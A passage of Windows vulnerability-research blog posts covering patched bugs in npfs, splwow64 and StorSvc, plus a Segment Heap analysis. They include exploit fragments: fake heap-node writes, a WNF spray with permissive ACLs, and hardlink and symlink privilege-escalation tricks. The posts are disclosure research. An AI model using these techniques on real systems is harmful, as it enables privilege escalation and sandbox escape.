(UINT64)sizeof(UINT64), (UINT64)&dwByte); break; } pTempRootChunk = pRootChunkAddr; if (pLeftChunk > pRootChunkAddr) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pLeftChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); pRootChunkAddr = pRightChunk; continue; } else if (pRootChunkAddr > pRightChunk) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRightChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); pRootChunkAddr = pLeftChunk; continue; } if (pTargetChunk < pRootChunkAddr) { pRootChunkAddr = pLeftChunk; continue; } if (pTargetChunk > pRootChunkAddr) { pRootChunkAddr = pRightChunk; continue; } }After all fix, it's time to pop cmd. Because Adobe Reader render process in a Job, I can't create process from it, so I inject shellcode to browser process and write a file in volume C: to complete exploit.
Patch
Microsoft patched the vulnerability in February 2022, npfs uses int type to calculate the total size and check if the total size larger than maximum ushort value.
NTSTATUS __fastcall NpTranslateContainerLocalAlias(struct _UNICODE_STRING *a1, void *a2, _DWORD *a3) { [...] if ( v13 ) { if ( TokenInformation ) { v20 = DestinationString.Length + v37.Length; v21 = v20 + 120; v22 = v20 + 122; } else { v21 = v37.Length + 96; v22 = v37.Length + 98; } } else { v21 = DestinationString.Length + 112; v22 = DestinationString.Length + 114; } if ( !v18 ) v22 = v21; v23 = v19 + v22; if ( v23 <= 0xFFFE ) { v28.MaximumLength = v23; Pool2 = (WCHAR *)ExAllocatePool2(256i64, (unsigned __int16)v23, 1850110030i64); [...] } Demonstrate how I use WNF API with a accessible SD BOOLEAN AllocateWnfObject(DWORD dwWantedSize, PWNF_STATE_NAME pStateName) { NTSTATUS Status; HANDLE gProcessToken; WNF_TYPE_ID TypeID = { 0 }; PSECURITY_DESCRIPTOR SecurityDescriptor; ULONG RetLength = 0; BOOL DaclPresent, SaclPresent; BOOL DaclDefault, SaclDefault, OwnerDefault, GroupDefault; PACL pDacl, pSacl; PSID pOwner, pGroup; ACE_HEADER* AceHeader; ACCESS_ALLOWED_ACE* pACE; PSECURITY_DESCRIPTOR GetSD; Status = fNtOpenProcessToken(GetCurrentProcess(), MAXIMUM_ALLOWED, &gProcessToken); if (Status < 0) { return FALSE; } SecurityDescriptor = (PSECURITY_DESCRIPTOR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000); // initialize a new SD GetSD = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x1000); Status = fNtQuerySecurityObject( gProcessToken, OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION | LABEL_SECURITY_INFORMATION, GetSD, 0x1000, &RetLength); // Query a accessible SD from process token if (Status < 0) { return FALSE; } // Get Owner/Group/DACL/SACL from accessible security object GetSecurityDescriptorOwner(GetSD, &pOwner, &OwnerDefault); GetSecurityDescriptorGroup(GetSD, &pGroup, &GroupDefault); GetSecurityDescriptorDacl(GetSD, &DaclPresent, &pDacl, &DaclDefault); GetSecurityDescriptorSacl(GetSD, &SaclPresent, &pSacl, &SaclDefault); AceHeader = (ACE_HEADER*)&pDacl[1]; while ((DWORD)AceHeader < (DWORD)pDacl + (DWORD)pDacl->AclSize) { if (AceHeader->AceType == ACCESS_ALLOWED_ACE_TYPE) { pACE = (ACCESS_ALLOWED_ACE*)&AceHeader[0]; pACE->Mask = GENERIC_ALL; } AceHeader = (ACE_HEADER*)((DWORD)AceHeader + (DWORD)AceHeader->AceSize); } // Set it to new SD InitializeSecurityDescriptor(SecurityDescriptor, SECURITY_DESCRIPTOR_REVISION); SetSecurityDescriptorOwner(SecurityDescriptor, pOwner, OwnerDefault); SetSecurityDescriptorGroup(SecurityDescriptor, pGroup, GroupDefault); SetSecurityDescriptorDacl(SecurityDescriptor, DaclPresent, pDacl, DaclDefault); SetSecurityDescriptorSacl(SecurityDescriptor, SaclPresent, pSacl, SaclDefault); HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, GetSD); Status = fNtCreateWnfStateName( pStateName, WnfTemporaryStateName, WnfDataScopeSession, FALSE, &TypeID, 0x1000, SecurityDescriptor); // invoke WNF API with new SD if (Status < 0) { return FALSE; } PVOID lpBuff = (PVOID)malloc(dwWantedSize - 0x20); memset(lpBuff, 0x00, dwWantedSize - 0x20); Status = fNtUpdateWnfStateData( pStateName, lpBuff, dwWantedSize - 0x20, &TypeID, NULL, 0, 0); if (Status < 0) { return FALSE; } free(lpBuff); return TRUE; } ReferenceSecurity Update Guide - Microsoft Security Response Center
Time line
2021-10-17 Reported vulnerability to Microsoft via TianfuCup 2021
2022-02-08 Microsoft released patch, assigned CVE-2022-22715
2022-08-23 Blogpost is publiced in partnership with Adobe Product Security Incident Response Team
The Story Of CVE-2021-1648
The Story Of CVE-2021-1648
Author: k0shl of 360 Vulcan Team
SummaryIn January 2021 patch tuesday, MSRC patched a vulnerability in splwow64 service, assigned to CVE-2021-1648(also known as CVE-2020-17008), which merged my two interesting cases which bypass the patch of CVE-2020-0986, one of them also be found by Google Project Zero((https://bugs.chromium.org/p/project-zero/issues/detail?id=2096).actually this include one EoP and two info leak cases.
This vulnerability was planned to patch in October 2020, but MSRC seems found some other serious security problems in service, so they postpone the patch for four months.
BackgroundIn this blog, I don't want to talk more about the mechanism of splwow64, there are a lot of analysis of CVE-2020-0986 before, so let's focus on the vulnerability.
After CVE-2020-0986 had been patched, I make a quick bindiff on splwow64 and gdi32full, and found there are two check added after patch.
One is that Microsoft added two printer handle(or aka cookie?) check functions named "FindDriverForCookie" and "FindPrinterHandle", it will check printer driver handle which store in a global variable.
__int64 __fastcall FindDriverForCookie(__int64 a1) { v3 = qword_1800EABA0; if ( qword_1800EABA0 ) { do { if ( a1 == *(_QWORD *)(v3 + 56) ) //check driver index break; v3 = *(_QWORD *)(v3 + 8); } while ( v3 ); if ( v3 ) ++*(_DWORD *)(v3 + 44); } RtlLeaveCriticalSection(&semUMPD); return v3;// return driver heap } __int64 *__fastcall FindPrinterHandle(__int64 a1, int a2, int a3) { for ( i = *(__int64 **)(v3 + 64); i && (*((_DWORD *)i + 2) != v5 || *((_DWORD *)i + 3) != v4); i = (__int64 *)*i ) //check printer handle ; }Another is that MSRC added two pointer check functions "UMPDStringPointerFromOffset" and "UMPDPointerFromOffset" to check if pointer is validate.
FindDriverForCookie and FindPrinterHandle bypassFirst, I don't know the purpose that Microsoft add FindDriverForCookie and FindPrinterHandle, maybe it's not for mitigation? After quick review, I found there is a command named 0x6A that can set printer handle which the value we can controll in global variable of service to bypass this two check functions.
__int64 __fastcall bAddPrinterHandle(__int64 a1, int a2, int a3, __int64 a4) { v9 = RtlAllocateHeap(*(_QWORD *)(__readgsqword(0x60u) + 48), 0i64, 24i64); v10 = (_QWORD *)v9; if ( v9 ) { *(_DWORD *)(v9 + 8) = v6; *(_DWORD *)(v9 + 12) = v5; *(_QWORD *)(v9 + 16) = v8; RtlEnterCriticalSection(&semUMPD); *v10 = *(_QWORD *)(v4 + 0x40); v7 = 1; *(_QWORD *)(v4 + 0x40) = v10; //add print handle which can be controlled by user RtlLeaveCriticalSection(&semUMPD); } return v7; }By invoking command 0x6A, function bAddPrinterHandle will add print handle to driver heap which stored in global variable |qword_1800EABA0|.
//set print handle to 0xdeadbeef00006666 0:007> p gdi32full!bAddPrinterHandle+0x54: 00007ff8`380fc3bc 44897808 mov dword ptr [rax+8],r15d ds:00000000`0108a428=00000000 0:007> p gdi32full!bAddPrinterHandle+0x58: 00007ff8`380fc3c0 4489700c mov dword ptr [rax+0Ch],r14d ds:00000000`0108a42c=00000000 0:007> r r14d r14d=deadbeef 0:007> r r15d r15d=6666 //driver heap stored in global variable 0:007> dq gdi32full+0xEABA0 l1 00007ff8`381baba0 00000000`0108d000 0:007> dq 108d000+0x40 l1 00000000`0108d040 00000000`0108a420 0:007> dq 108a420+0x8 l1 00000000`0108a428 deadbeef`00006666So we can easy bypass printer handle check during invoking Command 0x6D, and hit the vulnerability code.
case 0x6Du: v31 = FindDriverForCookie(*(_QWORD *)(v6 + 24)); v32 = v31; if ( !v31 ) goto LABEL_137; v33 = FindPrinterHandle(v31, *(_DWORD *)(v6 + 32), *(_DWORD *)(v6 + 36)); ... [vulnerability code] CVE-2021-1648: arbitrary address readLet's talk about information disclosure, CVE-2020-1648 includes a arbitrary address read information disclosure.
if ( v51 != -1 ) { v57 = **(unsigned __int16 ***)(v6 + 0x50); //not check v57 if ( v57 ) { v58 = v57[34]; v59 = v58 + v57[35]; if ( (unsigned int)v59 >= v58 && (unsigned int)v59 <= 0x1FFFE ) memcpy_0(*(void **)(v6 + 88), v57, v59); //arbitrary address read } }The code of case Command 0x6D is too long, so I won't post all of them in my blog. In short, it will check destination address of memcpy if it's in "validate" range, the range of |v6+0x58|, but source address |v57| isn't checked, so we can read arbitrary address.
0:007> r rax=0000000000868a00 rbx=000000000001fffe rcx=0000000000000000 rdx=4141414141414141 rsi=0000000000150200 rdi=00000000008688d0 rip=00007ff9fc008403 rsp=000000000210f480 rbp=000000000210f4f9 r8=100297f000000002 r9=000000000022f000 r10=00000fff3c9c801d r11=000000000210f350 r12=0000000000868920 r13=0000000000868910 r14=0000000000000001 r15=0000000000461c50 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 gdi32full!GdiPrinterThunk+0x1a73: 00007ff9fc008403 0fb74a44 movzx ecx,word ptr [rdx+44h] ds:4141414141414185=????Stack trace:
0:007> k Child-SP RetAddr Call Site 000000000210f480 00007ff7558e78ab gdi32full!GdiPrinterThunk+0x1a73 000000000210f560 00007ff7558e84de splwow64+0x78ab 000000000210f650 00007ff7558e9f28 splwow64+0x84de 000000000210f6b0 00007ff9fe3f2e93 splwow64+0x9f28 000000000210f6e0 00007ff9fe3f45b4 ntdll!RtlDeleteCriticalSection+0x363 000000000210f730 00007ff9fc487bd4 ntdll!RtlInitializeResource+0xce4 000000000210faf0 00007ff9fe42ce51 KERNEL32!BaseThreadInitThunk+0x14 000000000210fb20 0000000000000000 ntdll!RtlUserThreadStart+0x21 Another two cases of CVE-2021-1648Another two cases I reported to MSRC is about bypassing offset check functions "UMPDStringPointerFromOffset" and "UMPDPointerFromOffset", I think MSRC made a mistake in these two functions range check.
Splwow64 is a specail service which is compatible with x86 in x86-64 Windows OS, so it always allocate heap which is 32bits, but in CVE-2020-0986 patch, "UMPDStringPointerFromOffset" and "UMPDPointerFromOffset" only check if offset and |portview+offset| is less than 0x7fffffff.
signed __int64 __fastcall UMPDPointerFromOffset(unsigned __int64 *a1, __int64 a2, unsigned int a3) { [...] if ( v3 <= 0x7FFFFFFF && v3 + a3 <= 0x7FFFFFFF ) { *a1 = v3 + a2; return 1i64; } [...] } signed __int64 __fastcall UMPDStringPointerFromOffset(unsigned __int64 *a1, __int64 a2) { [...] if ( v3 > 0x7FFFFFFF ) goto LABEL_12; v4 = (0x7FFFFFFF - v3) >> 1; *a1 = v3 + a2; v5 = (unsigned int)v4; if ( v3 + a2 ) v2 = wcsnlen((const wchar_t *)(v3 + a2), (unsigned int)v4); [...] return result; }But in splwow64 service, so many heaps even stack is allocated in low address, like this:
0:004> pc splwow64!TLPCMgr::ProcessRequest+0x99: 00007ff6`846d7c71 e826490000 call splwow64!operator new[] (00007ff6`846dc59c) 0:004> p splwow64!TLPCMgr::ProcessRequest+0x9e: 00007ff6`846d7c76 488bf0 mov rsi,rax 0:004> r rax rax=00000000007d7c70 0:004> r rsp rsp=000000000217f400So it is possible to exploit through occupy to some important heaps or stack in splwow64 service, I suggest MSRC in my report to check range of pointer if it's in portview section instead of 0x7fffffff.
two cases crash dump:
0:006> r rax=0000000000000000 rbx=00000000012f8360 rcx=000000001363d9e0 rdx=00000000012f8360 rsi=0000000002d60200 rdi=000000001363d9d8 rip=00007fff728956d2 rsp=0000000002cdf230 rbp=0000000000000001 r8=0000000000000028 r9=0000000012345678 r10=000000007fffffff r11=2222222222222222 r12=00007fff57ea8fe0 r13=0000000001208210 r14=000000000120aa50 r15=00007fff72860000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 gdi32full!UMPDStringPointerFromOffset+0x12: 00007fff728956d2 4c8b09 mov r9,qword ptr [rcx] ds:000000001363d9e0=???????????????? 0:006> r rax=0000000000000001 rbx=0000000001628360 rcx=0000000042a3c4a1 rdx=0000000001628360 rsi=0000000000ff0200 rdi=0000000000000000 rip=00007fff7289568a rsp=0000000002ecf3d8 rbp=0000000000000001 r8=0000000000000028 r9=0000000041414141 r10=000000007fffffff r11=2222222222222222 r12=00007fff57ea8fe0 r13=0000000001407160 r14=000000000140a000 r15=00007fff72860000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 gdi32full!UMPDPointerFromOffset+0xa: 00007fff7289568a 4c8b09 mov r9,qword ptr [rcx] ds:0000000042a3c4a1=???????????????? The end of storyIt seems Microsoft redsigned splwow64 printer service, so they postponed the patch for four months, it's really a long time for me to wait a patch since I started my researching on Windows. Hope new printer service will be more secure:P.
Timeline
2020-07-27 Reported to MSRC.
2020-08-19 MSRC decided to put off patch.
2020-08-22 Bounty awarded
2021-01-13 Patch release
StorSvc writeup and introduction about my analysis script
StorSvc writeup and introduction about my analysis script
Author: k0shl of Qihoo 360 Vulcan Team
Today, I'd like to share two of my favorite logical escalation of priviledge vulnerabilities which I reported in 2019 -- CVE-2019-0983 and CVE-2019-0998 and a simple introduction about my RPC static analysis script, I public these two PoCs and my script in my github. All of them were found by reversing, actually, I don't know how to trigger it by normal user interactive and monite it with monitor such as procmon. I will share more detail about how I found it in this paper.
So let's begin our journey.
StorSvc overviewStorSvc is windows storage service which provide service for storage setttings and extern extension storage. There were two interesting vulnerabilities about Storage Service in history, CVE-2018-0983 which reported by James Forshaw, and a blog(SandboxEscaper deleted that paper) from SandboxEscaper. So I decided to look into this service.
According to James Forshaw and SandboxEscaper founding, they both focused on a RPC interface storsvc!SvcMoveFileInheritSecurity, and after patched, Microsoft seemed patched this logical vulnerability with "a simple way".
After Patch
signed __int64 SvcMoveFileInheritSecurity() { return 0x80004001; }But this was not the only RPC interface in this service, after I reversed StorSvc.dll, I found two interesting points.
StorSvc volume structureBefore I introduce about my CVEs, I'd like to talk about a interesting structure during reversing.
Almost every RPC interface reference this structure and check it.
such as:
v6 = 0x450 * v5; v7 = *(_DWORD *)(0x450 * v5 + g_StorageService[v3 + 5] + 564); if ( !(v7 & 1) .... LODWORD(v4) = StringCchCopyW(&FileName, 0x104ui64, (const wchar_t *)(v6 + g_StorageService[v3 + 5] + 4)); if ( (signed int)v4 >= 0 ) { ..... }As the code show, variable v5 looks like a index, and there is a structure which size is 0x450, g_StorageService is a global variable which store these structures like a structures table. When I went into these RPC interfaces, it always be failure when service check this structure.
0:002> dc poi(0x7ffe5b683bb0+0x28)+0x450 l4 00000169`44831820 00000000 00000000 00000000 00000000 ................The content of this structure always be zero. That's bad, so I tried to find why it failed and how to set the value.
After some code review, I noticed that this content can be set by mounting a extension volume.
Now I knew why this value always be zero, I tested it in VM, and there was only one origin volume C:\ in VM. After a little researched, there was a easy way to make it work, I could added a new disk in VM, such as E:. And then, the content of structure is set, and I can got some variable in structure meaning, for example, the offset 0x4 in this structure was point to VolumeName, the offset 0x234 in this structure was point to volume state.
0:001> dc poi(0x7ffe5b683bb0+0x28)+0x450 l4 00000169`44831820 00000000 003a0045 0000005c 00000000 ....E.:.\.......
Now let me introduce CVE-2019-0983 and CVE-2019-0998.
(I used hardlink in these two CVEs, because Microsoft wasn't release hardlink mitigation at that time)
The vulnerability caused by a logical error in StorageService::ProvisionStorageCardForUser, error code like this:
__int64 __fastcall StorageService::ProvisionStorageCardForUser(__int64 a1, int a2, unsigned int a3, wchar_t *a4) { v22 = StringCchPrintfW(&ExistingFileName, 0x104ui64, L"%s\\desktop.ini"); v9 = 0; if ( v22 >= 0 ) { v23 = StringCchPrintfW(&NewFileName, 0x104ui64, L"%s\\desktop.ini", v21); v9 = 0; if ( v23 >= 0 ) { CopyFileW(&ExistingFileName, &NewFileName, 0); v9 = 0; } } }CVE-2019-0983 is easy to understand. ExistingFileName was "C:\User\k0shl\Video\desktop.ini", and NewFileName was "E:\User\k0shl\Video\desktop.ini", these two files could be controlled by normal user. So I can create a hardlink to a high priviledge file. It will finally be occupied by my controlled file.
After patch:
v15 = RpcImpersonateClient(0i64); if ( v15 < 0 ) goto LABEL_44; v23 = (void **)&v39; if ( v41 >= 8 ) v23 = v39; v24 = &v35; if ( (unsigned __int64)Dst >= 8 ) v24 = (struct _SECURITY_ATTRIBUTES **)v35; if ( StringCchPrintfW(&ExistingFileName, 0x104ui64, L"%s\\desktop.ini", v24) >= 0 && StringCchPrintfW(&NewFileName, 0x104ui64, L"%s\\desktop.ini", v23) >= 0 ) { CopyFileW(&ExistingFileName, &NewFileName, 0); } RpcRevertToSelf();It invokes RPCimpersonateClient() before CopyFileW().
CVE-2019-0998The vulnerability caused by a logical error in StorSvc!SvcSetStorageSettings, the error code in function StorageService::SetWriteAccess :
v14 = GetUserFolder(&pObjectName); ... _wsplitpath_s(&pObjectName, 0i64, 0i64, 0i64, 0i64, &Filename, 0x104ui64, 0i64, 0i64); LODWORD(phkResult) = StringCchCopyW( &PathName, 0x104ui64, (const wchar_t *)(*(_QWORD *)(v7 + 8i64 * (_QWORD)v6 + 40) + 1104 * v11 + 4)); if ( (signed int)phkResult >= 0 ) { LODWORD(phkResult) = PathCchAppend(&PathName, 260i64, &Filename); if ( !CreateDirectoryW(&PathName, &SecurityAttributes) ) { v17 = GetLastError(); if ( v17 == 183 ) { v18 = SetNamedSecurityInfoW( &PathName, SE_FILE_OBJECT, 4u, 0i64, 0i64, *(PACL *)&SecurityAttributes.nLength, 0i64);First, service invoked GetUserFolder() to get a full folder path and _wsplitpath_() to split full path to its final name. For example, GetUserFolder() return a full path "C:\User\k0shl", and after _wsplitpath_(), I get FileName "k0shl".
And finally PathName will set to "E:\k0shl" and invoke CreateDirectory, service want to create a user folder in another volume, and if it create directory failed, it will get last error value, if value is 0xb7, it means file already exist. Service will invoke SetNamedSecurityInfoW to set it DACL, but it not check if PathName is a file or a directory. How about "E:\k0shl" is a file not a direcotry? If I create a file instead of directory in volume and make a symbolic link to a high priviledge file, it will finally modified high priviledge file's DACL.
After patch:
if ( CreateDirectoryW(&PathName, &SecurityAttributes) ) goto LABEL_107; v17 = GetLastError(); if ( v17 == 183 ) { if ( !(GetFileAttributesW(&PathName) & 0x10) ) { LODWORD(phkResult) = -2147024891; goto LABEL_92; } v18 = SetNamedSecurityInfoW( &PathName, SE_FILE_OBJECT, 4u, 0i64, 0i64, (PACL)SecurityAttributes.lpSecurityDescriptor, 0i64);After patch, it check the file's attribute to confirm it's a directory. Actually, I think there is still a TOCTOU, but after I test it, the time window is too small, I can't delete directory and make a symbol link between GetFileAttribute and SetNamedSecurityInfoW. Of course, I also can't use oplock, because GetFileAttribute() just query file object information.
Introduction about my analysis scriptAfter I reported these two logical vulnerabilities, I thought about how I found these two vulnerabilities. First, I found some sensitive functions such as SetNamedSecurityInfo or CopyFile, and I get a code path from RPC interface.
As I said in my another blog, I finally decide to write a script to help me analyze all RPC server.
I make a simple framework about script in my mind.
- Step 1: I need to get all RPC server
- Step 2: I need to get all RPC interfaces
- Step 3: I need to parse RPC dll or exe in IDA
- Step 4: I need to find a code path from RPC interface to sensitive function
Actually, all of this were easy to complete, I use James Forshaw's awesome tool NtApiDotNet, I can use this tool to help me to parse RPC server, there is a class named Win32 in NtApiDotNet, and a interesting method named ParsePeFile.
This function can parse RPC server and export RPC interfaces like RPCView, I just need the RPC interface name.
public static IEnumerable<RpcServer> ParsePeFile(string file, string dbghelp_path, string symbol_path, bool parse_clients, bool ignore_symbols) { List<RpcServer> servers = new List<RpcServer>(); using (var result = SafeLoadLibraryHandle.LoadLibrary(file, LoadLibraryFlags.DontResolveDllReferences, false)) { if (!result.IsSuccess) { return servers.AsReadOnly(); } var lib = result.Result; var sections = lib.GetImageSections(); var offsets = sections.SelectMany(s => FindRpcServerInterfaces(s, parse_clients)); if (offsets.Any()) { using (var sym_resolver = !ignore_symbols ? SymbolResolver.Create(NtProcess.Current, dbghelp_path, symbol_path) : null) { foreach (var offset in offsets) { IMemoryReader reader = new CurrentProcessMemoryReader(sections.Select(s => Tuple.Create(s.Data.DangerousGetHandle().ToInt64(), (int)s.Data.ByteLength))); NdrParser parser = new NdrParser(reader, NtProcess.Current, sym_resolver, NdrParserFlags.IgnoreUserMarshal); IntPtr ifspec = lib.DangerousGetHandle() + (int)offset.Offset; var rpc = parser.ReadFromRpcServerInterface(ifspec); servers.Add(new RpcServer(rpc, parser.ComplexTypes, file, offset.Offset, offset.Client)); } } } } return servers.AsReadOnly(); }And in IDA, I can used IDAPython to parse code path with xrefs, and I also found that there maybe path explosion in analyze python script, so I set a recursion depth to 10 and 7, if the function call count is larger than recursion depth, it will return diffrent result, of course you can change it. Now I collected all I need for this script now.
In my script(about script config please check it in my github):
- I go through all exe and dll file under C:\Windows\System32(Actually, this not include all RPC servers, there are some other RPC servers in other directory or suffix diffrent from "dll" or "exe" such as Windows Defender or unimdm.tsp, you can config the search path in my script)
- I use Win32.RPC.ParsePeFile to parse every file, if it's a RPC server, it will return code like IDL
- I create a file store sensitive functions and use a IDAPython script to parse RPC dll or exe
- I get all the code path to sensitive functions, and if it start from RPC interface which get from the result by Win32.RPC.ParseFile, I store it in SpecialFinal.txt
The result like:
SvcSetStorageSettings[////////__imp_SetNamedSecurityInfoW<--?CreateStorageCardDirectory@StorageService@@IEAAJW4_STORAGE_DEVICE_TYPE@@KPEBGKPEAU_SECURITY_ATTRIBUTES@@PEAU_ACL@@H@Z<--?ProvisionStorageCardForUser@StorageService@@IEAAJW4_STORAGE_DEVICE_TYPE@@KPEAG1KPEAU_SECURITY_ATTRIBUTES@@PEAU_ACL@@@Z<--?SetWriteAccess@StorageService@@IEAAJW4_STORAGE_DEVICE_TYPE@@KK@Z<--?SetStorageSettings@StorageService@@QEAAJW4_STORAGE_DEVICE_TYPE@@KW4_STORAGE_SETTING@@K@Z<--SvcSetStorageSettings] SvcSetStorageSettings[////////__imp_CopyFileW<--?ProvisionStorageCardForUser@StorageService@@IEAAJW4_STORAGE_DEVICE_TYPE@@KPEAG1KPEAU_SECURITY_ATTRIBUTES@@PEAU_ACL@@@Z<--?SetWriteAccess@StorageService@@IEAAJW4_STORAGE_DEVICE_TYPE@@KK@Z<--?SetStorageSettings@StorageService@@QEAAJW4_STORAGE_DEVICE_TYPE@@KW4_STORAGE_SETTING@@K@Z<--SvcSetStorageSettings] Time Line
Feb 2019 : Vulnerabilities Reported
Feb 2019 : Microsoft reproduced
May 2019 : Patch released
May 2019 : Bounty awarded
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0983
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0983
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0998
https://github.com/k0keoyo/ksRPC_analysis_script
https://github.com/k0keoyo/my_vulnerabilities/tree/master/CVE-2019-0983
https://github.com/k0keoyo/my_vulnerabilities/tree/master/CVE-2019-0998
Segment Heap的简单分析和Windbg Extension
Segment Heap的简单分析和Windbg Extension
Author: k0shl of 360 Vulcan Team
简述微软在Windows 10启用了一种新的堆管理机制Low Fragmentation Heap(LFH),在常规的环三应用进程中,Windows使用Nt Heap,而在特定进程,例如lsass.exe,svchost.exe等系统进程中,Windows采用Segment Heap,关于Nt Heap,可以参考Angel boy在WCTF赛后的分享Windows 10 Nt Heap Exploitation,而Segment Heap可以参考MarkYason在16年Blackhat上的议题Windows 10 Segment Heap Internals。
在Yason的议题中对于Segment Heap的分析已经足够详细,NT Heap和Segment Heap的结构差异较大,我在这篇文章中只对Segment Heap在Windows ntdll中的代码逻辑实现进行简单分析,以及我针对Segment Heap编写的windbg extension简单介绍。
Segment Heap的创建Windows在系统进程中使用Segment Heap,部分应用也使用了Segment heap,比如Edge,如果想调试自己的程序,可以在注册表中添加相应键值开启Segment Heap。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\(executable) FrontEndHeapDebugOptions = (DWORD)0x08通过windbg !heap命令可以看到当前进程的堆布局。
2: kd> !process 1f0 0 Searching for Process with Cid == 1f0 PROCESS ffffcf026f1cc0c0 SessionId: 0 Cid: 01f0 Peb: 1803b03000 ParentCid: 01e8 DirBase: 01850002 ObjectTable: ffffbd0dfbaea080 HandleCount: 574. Image: csrss.exe 2: kd> .process /i /p ffffcf026f1cc0c0 You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context. 2: kd> g 0: kd> .reload /user Loading User Symbols .................... 0: kd> !heap Heap Address NT/Segment Heap 14bff720000 Segment Heap 7df42cce0000 NT Heap关于Segment Heap和Nt Heap通过其头部结构的Signature成员变量区分,Signature保存在Heap Header+0x10位置,当Signature为0xDDEEDDEE时,该堆为Segment Heap,而当Signature为0xFFEEFFEE时,该堆为Nt Heap。
0: kd> dq 14bff720000 l3//Segment Heap 0000014b`ff720000 00000000`01000000 00000000`00000000 0000014b`ff720010 00000000`ddeeddee 0: kd> dq 7df42cce0000 l3//Nt Heap 00007df4`2cce0000 00000000`00000000 01009ba1`00f60fd8 00007df4`2cce0010 00000001`ffeeffee当进程初始化时,进程会调用RtlInitializeHeapManager函数创建堆管理结构,内层函数调用RtlpHpOptIntoSegmentHeap决定是否创建SegmentHeap,在RtlpHpOptIntoSegmentHeap函数中会检查进程明程等内容,当属于指定系统进程或者Package时,会设置对应的Feature,最后创建Segement Heap设置_SEGMENT_HEAP->Signature值为0xDDEEDDEE。
__int64 __fastcall RtlpHpOptIntoSegmentHeap(unsigned __int16 *a1) { v1 = a1; v16 = L"svchost.exe"; //----->指定的系统进程 v2 = 0; v17 = L"runtimebroker.exe";//----->指定的系统进程 v18 = L"csrss.exe";//----->指定的系统进程 v19 = L"smss.exe";//----->指定的系统进程 v20 = L"services.exe";//----->指定的系统进程 v21 = L"lsass.exe";//----->指定的系统进程 ... } //调用路径 LdrpInitializeProcess |__RtlInitializeHeapManager |__RtlpHpOptIntoSegmentHeap //最终在RtlpHpHeapCreate函数中将+0x10 Signature值置为0xDDEEDDEE __int64 __fastcall RtlpHpHeapCreate(unsigned __int32 a1, unsigned __int64 a2, __int64 a3, __m128i *a4) { v9 = (__m128i *)RtlpHpHeapAllocate(v6, v7, (__m128i *)&v36); v9[1].m128i_i32[0] = 0xDDEEDDEE;//mov dword ptr [rax+10h], 0DDEEDDEEh }因此我在编写segment heap的windbg extension时,通过查看的Bucket Block地址找到Segment Heap Header之后通过查看对应Signature是否为0xDDEEDDEE用于确认查找的地址是否是一个有效的Bucket地址。
Segment Heap LFHAllocate接下来对Segment Heap的分配和释放进行简单分析,首先我们需要了解_SEGMENT_HEAP中的一个关键结构_HEAP_LFH_CONTEXT,其成员在偏移0x340位置,在_HEAP_LFH_CONTEXT结构偏移0x80位置存放着一个Bucket Table,其结构关系如下。
0: kd> dt _SEGMENT_HEAP LfhContext ntdll!_SEGMENT_HEAP +0x340 LfhContext : _HEAP_LFH_CONTEXT 0: kd> dt _HEAP_LFH_CONTEXT Buckets ntdll!_HEAP_LFH_CONTEXT +0x080 Buckets : [129] Ptr64 _HEAP_LFH_BUCKET在BucketTable中存放不同Size的Bucket Manager pointer,其实LFH并非在最开始就处于待分配状态,在堆最开始分配的时候是通过正常的Variable Size分配,关于vs heap的分配可以参考Yason的slide,当进程申请堆时会调用ntdll!RtlAllocateHeap,在分配时会检查Signature是否是SegmentHeap。
__int64 __fastcall RtlAllocateHeap(_SEGMENT_HEAP *a1, unsigned int a2, __int64 a3) { if ( !a1 ) RtlpLogHeapFailure(19i64, 0i64); if ( a1->Signature == 0xDDEEDDEE ) return RtlpHpAllocWithExceptionProtection((__int64)a1, a3, a2); if ( RtlpHpHeapFeatures & 2 ) return RtlpHpTagAllocateHeap((__int64)a1, a3, a2); return RtlpAllocateHeapInternal(a1, a3, a2, 0i64); }若Signature值为0xDDEEDDEE时,会调用RtlpHpAllocWithExceptionProtection创建segment heap block,在最开始的时候,会检查Bucket Table中lfh是否已经激活,也就是第一比特是否为1,当第一比特为1时,当前Bucket处于未激活lfh的情况,会创建vs heap,我们暂不讨论vs heap的申请。
3: kd> dq 116abf90000+340+80//Bucket Table 00000116`abf903c0 00000000`00000001 00000000`00000001 00000116`abf903d0 00000000`026e0001 00000116`abf90900//已经激活LFH索引的指针 00000116`abf903e0 00000000`01ee0001 00000000`030f0001//未激活的索引 00000116`abf903f0 00000000`04100001 00000000`00820001 00000116`abf90400 00000000`01280001 00000000`00e30001 00000116`abf90410 00000000`00210001 00000000`00410001Segment Heap的分配实现在RtlpAllocateHeapInternal函数中,由于代码逻辑较长但并不复杂,我这里只标明与我本文相关的逻辑部分,具体逻辑需要感兴趣的读者自行逆向。
